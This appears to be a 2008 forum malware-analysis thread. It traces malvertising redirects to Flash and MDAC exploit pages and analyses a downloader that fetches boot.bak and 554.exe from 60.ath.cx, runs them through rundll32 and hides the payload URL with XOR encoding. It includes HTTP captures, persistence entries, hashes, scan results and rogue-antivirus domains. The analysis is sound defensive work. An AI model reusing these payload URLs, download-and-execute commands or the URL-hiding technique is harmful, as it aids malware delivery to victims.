mnt-lower: MAINT-CN-UNICOM
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20071010
source: CNNIC

person: Jin Yang
nic-hdl: JY7-CN
e-mail: ip_address@cnuninet.com
address: No.133,Taiyun Building,Xidan North Street, Xicheng District,Beijing,China
phone: +86-10-66505588
fax-no: +86-10-66504252
country: CN
changed: ipas@cnnic.net.cn 20070927
mnt-by: MAINT-CNNIC-AP
source: CNNIC

220.196.0.0/17
AS9800 CHINAUNICOM BACKBONE No 133,Xi'dan North Street Beijing 100032

e-statistic.com

Found in a refer during a redirect to scanner.vavscan.com

CODE
GET /stats.php?site=[removed]&adv=[removed] HTTP/1.1
Accept: */*
Referer: http://scanner.vavscan.com/[removed]/[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: srv1.e-statistic.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.5.33
Date: Sat, 19 Jul 2008 16:28:08 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: keep-alive

e-statistic.com - 207.226.175.78

Website Title: 403 Forbidden
Registry Data
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2007-12-05
Expires: 2008-12-05
Updated: 2008-02-07
Name Server: NS1.E-STATISTIC.COM (has 1 domains)
Name Server: NS2.E-STATISTIC.COM
Whois Server: whois.publicdomainregistry.com

Server Type: nginx/0.5.33
IP Address: 207.226.175.78
IP Location - Virginia - Mc Lean - Beyond The Network America Inc
Response Code: 403
Dedicated Hosting: e-statistic.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: E-STATISTIC.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Kimberly

Jul 26 2008, 09:20 PM

Exploiting redirects in Flash content

Today I did spend some time reading network captures related to my recent rotator.adjuggler.com case and I discovered 2 new swf files served through advertising.

Network traces.

We notice an advertisment on the main page of www.saazy.com

CODE
<div class="ad_300x250">

<iframe width="300" height="250" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2">
<script language=javascript src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vj?z=terp517&dim=300757&pos=2&abr=$scriptiniframe"></script>
<noscript><a href="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/cc?z=terp517&pos=2">
<img src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vc?z=terp517&dim=300757&pos=2&abr=$imginiframe" width="300" height="250" border="0">
</a></noscript></iframe>

</div>

Let's follow the consecutive redirects ...

CODE
GET http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.saazy.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: rotator.adjuggler.com
Proxy-Connection: Keep-Alive

CODE
GET http://count4.exitexchange.com/exit/1222876 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE
GET http://count4.exitexchange.com/exit/1159049?3387160 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1222876
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE
GET http://30.ath.cx/viewpost.php?pid=25 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1159049?3387160
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Host: 30.ath.cx

At 30.ath.cx we stumble on some obfuscated code. Besides the usual Internet Explorer MDAC and the Microsoft XML Core Services exploits, we notice a part dedicated to Flash. Installed Flash version is tested and according to results either i47.swf or i115.swf will be used.

______________________________

What does i47.swf or i115.swf do ?

Upon "execution / analyse" they try to access Internet as seen below in order to download a file from 60.ath.cx which will be saved as c:\boot.bak

CODE
GET /up.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:11:08 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Cache-Control: private
Content-Transfer-Encoding: binary
Accept-Ranges: bytes
Content-Length: 33280
Content-Disposition: inline; filename=set.css
Connection: close

Content-Type: application/octet-stream

Once saved, the file will be executed by rundll32.exe because boot.bak is a Dll

rundll32 c:\boot.bak,DllCanUnloadNow

boot.bak reveals some interesting stuff as seen in the packet stream. We can see some loading points and additional files to download.

______________________________

Visible loading points using HijackThis.

O4 - HKLM\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKCU\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKUS\S-1-5-18\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'Default user')
O20 - Winlogon Notify: SysBackup - c:/boot.bak

______________________________

c:\boot.bak

Once loaded by rundll32.exe, list.php will be requested from the server. This file will be saved as C:\Documents and Settings\[username]\Cookies\site.yahoo.txt
It does contain a chain of hex characters which I deliberately left out of the stream. I suspect this *might* represent an URL ... but I'm unable to confirm this right now.

CODE
GET /list.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:03 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 61
Connection: close

Content-Type: text/html

The next step is to request 554.exe from 60.ath.cx which will be saved as C:\Documents and Settings\[username]\Cookies\0.exe

CODE
GET /files/554.exe HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
Last-Modified: Sat, 26 Jul 2008 14:40:29 GMT
ETag: "13a4459-1ae00-452ee4586d140"
Accept-Ranges: bytes
Content-Length: 110080
Connection: close

Content-Type: application/x-msdownload

0.exe will be executed by c:\boot.bak

______________________________

After reboot.

Once the computer rebooted, c:\boot.bak is loaded under the winlogon process and it will then launch 0.exe present on our HDD.

Files will be updated as "rundll32.exe" downloads list.php followed by the executable from internet again.
If I'm not mistaken, this method *could* allow to load whatever executable on boot without changing anything to the registry once boot.bak in place. Putting the files into the cookies folder is a nifty trick too as they will be considered as "harmless" by the average user.
______________________________

SWF Files.

When it comes to action script code i47.swf and i115.swf are identical. The addFrameScript() method is used to dynamically add a frame script.

i47.swf has 4 tags while i115.swf only has 3 tags.

The files are very difficult to analyse but the shellcode *might* again be hidden in the image as seen in the Kaspersky write-up.

VirusTotal results

Filename: ie_update.exe

This is the file from the Internet Explorer MDAC / Microsoft XML Core Services exploit. It performs the same actions as the Flash Files.

File size: 1024 bytes
MD5...: 4e6a301eb75586afdb4f2465aaf90fcb
SHA1..: 3f72fc5c1650b7ede99df39b9ac915f2197b0229
PEiD..: -

QUOTE
File ie_update.exe received on 07.26.2008 16:47:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.25 -
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Win32.KME.Based.1.Gen
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.25 -
F-Secure 7.60.13501.0 2008.07.26 W32/Downloader
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 W32/Downloader
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 suspected of Win32.Trojan.Downloader (http://...)
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -

______________________________

Filename: i47.swf

File size: 728 bytes
MD5...: 8c802fa1e22eb006def9b1df88f951c5
SHA1..: 751388f93da81188753e88050a36b9dd2066152d
SHA256: ea7e7f288f9d0125c5cb911ba4ea8d8a45fbe442fc864b71ad5568f9bc7c9481
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE
File i47.swf received on 07.26.2008 20:14:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 Hack.Exploit.Swf.a
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen

______________________________

Filename: i115.swf

File size: 754 bytes
MD5...: c7c21d95ffb6aaa3cc18a546803786fc
SHA1..: 5105810716e3d1816e02c81ca9310df01298b6c4
SHA256: 798225306d0c9c504c74c7ed57315220b97bd78bccab84890503d495c52763b7
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE
File i115.swf received on 07.26.2008 20:14:53 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Bloodhound.Exploit.193
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen

______________________________

Filename: boot.bak

File size: 110080 bytes
MD5...: b826aecb029962edbd771d149a920b21
SHA1..: a5ac9997a59ec1d227c0d708f9aacd8b5d33ffb4
SHA256: bf026894ea43cbcad39f554476dc1847cdec0cdb76e9161a1095c56a0a8c689f
PEiD..: -

QUOTE
File boot.bak received on 07.27.2008 00:59:17
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.26 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.26 -
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.27 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.27 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.27 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.27 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -

______________________________

Filename: 0.exe

File size: 33280 bytes
MD5...: 47d6acb7d79d7790da02b9fbd809eacb
SHA1..: 638f76a93cb6fc35c9a33e4a8b6d2971fd381411
SHA256: 7945086ac43c55423c44de4328ac41cef0e0143d597c98873d0f1f3941212ba6
PEiD..: -

QUOTE
File 0.exe received on 07.26.2008 20:15:47 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 HEUR/Crypted
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.25 Downloader.FraudLoad.A
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 Suspicious File
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Worm:Win32/Nuwar.KE
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 Malicious Software
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Packed.Generic.174
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Heuristic.Crypted

Update on site.yahoo.txt

QUOTE

It does contain a chain of hex characters which I deliberately left out of the stream. I suspect this *might* represent an URL ... but I'm unable to confirm this right now.

Thanks to MAD I may now confirm it does contain the URL of the file to download. Such a technique could make you download a different file tomorrow, run it on your computer without having to modify anything related to startup settings since the file is loaded by boot.bak.

Inside the stream capture of boot.bak ( cf http://www.bluetack.co.uk/Kimberly/Logs/swf232.jpg ) we notice a string called "sobaka-barabaka". Further analysis of boot.bak reveals the following portion of code :

CODE
10002C98   push    offset "sobaka-barabaka"
10002C9D   lea    eax, [ebp+var_3FC]
10002CA3   push    eax
10002CA4   call    dec0de

Note: the above is only a small snipit and it does not represent the complete decoding procedure (UrlDecoded).

We can call sobaka-barabaka a "key" to decode the string inside list.php aka site.yahoo.txt. The following reference table will come in handy for people who are not familiar with conversions.

CODE
s -> 115 -> 0x73 -> 163 -> 1110011
o -> 111 -> 0x6F -> 157 -> 1101111
b -> 98 -> 0x62 -> 142 -> 1100010
a -> 97 -> 0x61 -> 141 -> 1100001
k -> 107 -> 0x6B -> 153 -> 1101011
a -> 97 -> 0x61 -> 141 -> 1100001
...
...

Got the principe of conversion? Let's move on to decoding then. Our string is

21B1B1611514E0254515C00160945020B40040807045E4D5447554C041304

We leave aside the 2 in front of the chain and keep the rest.

1B1B1611514E0254515C00160945020B40040807045E4D5447554C041304

Being a hex representation the chain will be decoded per 2 using the "key".

key: s -> 115 -> 0x73 -> 163 -> 1110011
part: 1B
decode: 0x73^0x1B=0x68

0x68 in Hex represents 104 in ascii which represents the letter h

To decode the string, a loop is needed until all hex chars are processed. Below is the illustration / result of the decoding procedure.

CODE
0x73^0x1B:0x68 -> h
0x6F^0x1B:0x74 -> t
0x62^0x16:0x74 -> t
0x61^0x11:0x70 -> p
0x6B^0x51:0x3A -> :
0x61^0x4E:0x2F -> /
0x2D^0x02:0x2F -> /
0x62^0x54:0x36 -> 6
0x61^0x51:0x30 -> 0
0x72^0x5C:0x2E -> .
0x61^0x00:0x61 -> a
0x62^0x16:0x74 -> t
0x61^0x09:0x68 -> h
0x6B^0x45:0x2E -> .
0x61^0x02:0x63 -> c
0x73^0x0B:0x78 -> x
0x6F^0x40:0x2F -> /
0x62^0x04:0x66 -> f
0x61^0x08:0x69 -> i
0x6B^0x07:0x6C -> l
0x61^0x04:0x65 -> e
0x2D^0x5E:0x2F -> s
0x62^0x4D:0x2F -> /
0x61^0x54:0x35 -> 5
0x72^0x47:0x35 -> 5
0x61^0x55:0x34 -> 4
0x62^0x4C:0x2E -> .
0x61^0x04:0x65 -> e
0x6B^0x13:0x78 -> x
0x61^0x04:0x65 -> e

Which gives us http://60.ath.cx/files/554.exe
This file will be saved as C:\Documents and Settings\[username]\Cookies\0.exe

Special thanks fly out to MAD for confirming my initial thought of this being a link.

Kimberly

Jul 27 2008, 07:21 PM

ie_update.exe & i47.swf & i115.swf - A small demonstration

ie_update.exe - i47.swf - i115.swf perform all the same task, download 60.ath.cx/up.php, save the file as c:\boot.bak and run the file.

Since it's extremely difficult to work with the SWF files, I did chose ie_update.exe instead in order to show you the "embedded" link and actions taken.

Below we see the use of urlmon.URLDownloadToFileA. This function will be used to download our file and save it as c:\boot.bak.
In the hex dump, we already notice the URL

Let's follow the CALL EAX a bit closer. Screenshot below is "inside" urlmon.dll. We clearly see our two actors, 60.ath.cx/up.php and c:\boot.bak

Once our file downloaded, kernel32.WinExec is called. Once passed that call we get the prompt from ProcessGuard that ie_update.exe wants to start c:\boot.bak using rundll32.exe (boot.bak being a Dll)

The same actions are performed with i47.swf & i115.swf.

Kimberly

Jul 28 2008, 04:19 PM

Domains from 0.exe

Today I had a closer look at 0.exe, the file downloaded by c:\boot.bak. 0.exe contains a couple of interesting domains coded into it.

www.winifixer.com
avxp-08.com
youpornztube.com

winifixer.com

Website Title: WiniFixer
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-29
Expires: 2009-01-29
Updated: 2008-07-27
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: WINIFIXER.COM

Registrant:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
No NameServers Defined.

Administrative Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Technical Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Billing Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Websites.

Winifixer.com
Youpornztube.com

______________________________

youpornztube.com

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-03
Expires: 2009-03-03
Updated: 2008-07-27
Name Server: NS1.YOUPORNZTUBE.COM (has 1 domains)
Name Server: NS2.YOUPORNZTUBE.COM
Name Server: NS4.YOUPORNZTUBE.COM
Name Server: NS5.YOUPORNZTUBE.COM
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: YOUPORNZTUBE.COM

Registrant:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Creation Date: 03-Mar-2008
Expiration Date: 03-Mar-2009

Domain servers in listed order:
ns5.youpornztube.com
ns4.youpornztube.com
ns2.youpornztube.com
ns1.youpornztube.com

Administrative Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Technical Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Billing Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123
______________________________

avxp-08.com

Website Title: Antivirus XP 2008
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-24
Expires: 2009-07-24
Updated: 2008-07-27
Name Server: NS1.AVXP-08.COM (has 1 domains)
Name Server: NS2.AVXP-08.COM
Name Server: NS4.AVXP-08.COM
Name Server: NS5.AVXP-08.COM
Whois Server: whois.estdomains.com

IP Address: 85.255.118.171
IP Location - Ukraine - Ukrtelegroup Ltd

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: AVXP-08.COM

Registrant:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Creation Date: 24-Jul-2008
Expiration Date: 24-Jul-2009

Domain servers in listed order:
ns5.avxp-08.com
ns4.avxp-08.com
ns2.avxp-08.com
ns1.avxp-08.com

Administrative Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Technical Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Billing Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Websites.

Avxp-08.com
I-kerberos.com
Tobesoftware.com

______________________________

No NS servers are given for winifixer.com. On robtex, just before the page refreshes, we see it had 85.255.117.163 as IP and shared that same IP with youpornztube.com, avxp-08.com, tobesoftware.com and malwareprotector2008.com

Concerning youpornztube.com ... from Robtex

youpornztube.com is a domain controlled by five nameservers at youpornztube.com themselves There are two duplicate ipnumbers. All of them are on the same IP network. Incoming mail for youpornztube.com is handled by one mailserver which are also at youpornztube.com. youpornztube.com has one IP record . ns2.avxp08.com, tobesoftware.com, ns2.tobesoftware.com and ns2.malwareprotector2008.com point to the same IP. avxp08.com, tobesoftware.com and malwareprotector2008.com use this as a nameserver. antivirxp08.com share nameservers with this domain. avxp08.com, avxp2008.com, antivirxp08.com, tobesoftware.com, bakasoftware.net and at least six other hosts share mailservers with this domain. ns4.youpornztube.com, ns3.youpornztube.com, ns6.youpornztube.com, www.youpornztube.com, ns2.youpornztube.com and at least five other hosts are subdomains to this hostname.

85.255.117.163 is listed as being the current IP of youpornztube.com.

A quick check shows that they are moving domains around though. Currently resolving as ...

78.159.96.16 - tobesoftware.com
78.159.96.16 - advancedxpfixer.com
78.159.96.16 - antivirxp08.com

78.159.96.17 - antivirusprofessional2008.com
78.159.96.17 - avxp08.com
78.159.96.17 - avxp2008.com
78.159.96.17 - avxp-08.com

85.255.114.170 - antivirusxp-2008.com

85.255.118.171 - malwareprotector2008.com
85.255.118.171 - i-kerberos.com

194.110.162.114 - 216.195.41.11 - 216.240.139.169 - antivirusxp2008.com

211.95.79.242 - antivirusxp08.com

216.255.189.155 - bakasoftware.net

Kimberly

Jul 29 2008, 10:37 PM

gnida.swf ... some surprising results

gnida.swf, newbieadguide.com & co are they still used or dead? Only one way to figure out ... I was kinda surprised when I saw the link newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424 show up in search with a date / time stamp of 2008/07/17 00:54.

Let's narrow down a lil' bit.

Hmm ... some other links point their nose ... lil' peek on them also by isolating some stuff.

In our basket we now have

newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424
www.estandi.yoyo.pl/Aolmail.html
gogele.com
bull.s11.x-beat.com/src/bull124569.gif

and more recently newbieadguide.com replaced by

chocolatgirl.50webs.com/description/lame-enc.html

Ready for a ride?

newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424

No live redirect right now, at least not for me. It's setting a cookie and not showing stats so the campaign might still be "in use".
______________________________

estandi.yoyo.pl/Aolmail.html

Interesting case I must say; as it took me 2 minutes to figure out how the hell I suddenly ended up at scanning-computer-online.com. I didn't even have the chance to see estandi.yoyo.pl/Aolmail.html loading ...

On estandi.yoyo.pl/Aolmail.html we find a reference to a.js

The content of a.js does reveal us the next location ... aqtravel.info/find/search.php?said=Mkey5&q=Aolmail

At aqtravel.info we stumble on a 302 error which does forward us to the fake online scanner.

CODE
GET /find/search.php?said=Mkey5&q=Aolmail HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aqtravel.info
Connection: Keep-Alive

HTTP/1.1 302
